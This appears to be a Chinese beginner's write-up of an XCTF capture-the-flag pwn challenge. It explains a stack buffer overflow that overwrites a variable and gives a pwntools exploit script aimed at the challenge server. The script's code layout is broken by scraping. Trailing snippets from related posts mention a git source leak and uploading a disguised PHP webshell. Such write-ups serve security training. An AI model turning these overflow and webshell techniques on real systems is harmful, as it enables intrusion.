攻防世界pwn when did you

2021-10-04 20:52:32 字數 1559 閱讀 6570

這是我第一次寫部落格,希望幫助到大家,感謝大家的支援。

相信做這道題的同學們都是新手,或者是老手回來刷題。所以我這裡會簡單介紹我做pwn題的方法。

二、判斷程式型別

這個程式沒有.exe字尾,所以它不是window的,它是linux的。在我們學習pwn的初期都是linux的程式。

三、執行並了解程式

linux的程式windows執行不了,所以我們要把它放到linux作業系統中執行。

我這裡使用的是kali linux

傳檔案使用的是xshell

xshell rz可以傳輸檔案,非常方便,當然我們還有很多傳檔案的方法。

檔案傳輸成功後,了解程式的基本資訊。

推薦使用checksec,我們發現它是64位程式,開了nx和canary。

執行程式了解程式的工作流程。

這個就是程式的執行過程。

四、對程式進行逆向分析、找漏洞

對程式逆向有很多種方法,linux可以使用gdb,windows中有od和ida等等。我今天使用ida.

1.將程式放入ida中

ida有64和32兩個,對號入座我們的程式。

2.讀程式,發現漏洞

我們發現程式有兩個輸入,v5和v6,v6==1926就會輸出flag,但是我們輸入的v6的值不能等於1926.我們決定使用棧溢位來改變v6的值。

通過觀察棧的結構,var_20就是v5,var_18就是v6,當我們輸入v5時通過溢位,就可以改變v6的值。

五、寫漏洞攻擊**

from pwn import

*sh = remote(

"111.198.29.45"

,58015

)payload =

'a'*

8+p64(

0x0786

)sh.recvuntil(

"your birth?"

)sh.sendline(

'sss'

)sh.recvuntil(

"what's your name?\n"

)sh.sendline(payload)

sh.interactive(

)

最後我們可以得到flag。

攻防世界mfw 攻防世界 Web mfw

題目資訊 image.png 工具 githack,dirsearch 知識點 git漏洞 審計 開啟題目場景,檢查 發現這樣乙個頁面 image.png 訪問.git目錄,疑似存在git原始碼洩露 image.png 再用dirsearch掃瞄,發現git原始碼洩露 使用 githack獲取原始碼...

攻防世界Web lottery

開心!雖然第一次遇到git原始碼洩露寫了好久,但是寫出來了就很開心 開啟介面我們知道,要拿到flag,就要贏到足夠的錢,其實一開始我以為可以找到乙個地方直接修改餘額什麼的,把網頁源 中的檔案看了幾個都沒發現突破口 然後又沒思路了 嘗試了一下robots.txt,想看看有沒有什麼檔案,然後發現了 瞬間...

攻防世界 xctf Guess writeup

本題的解析官網上有,這裡是乙個自動化的指令碼,完成的是自動上傳乙個ant.jpg的檔案 ant.jpg是乙個ant.zip壓縮包重新命名的檔案,裡面是乙個ant.php的一句話木馬 執行返回的是在web後台這個檔案重新命名後的檔案的url。可通過zip偽協議訪問這個木馬。指令碼如下 import r...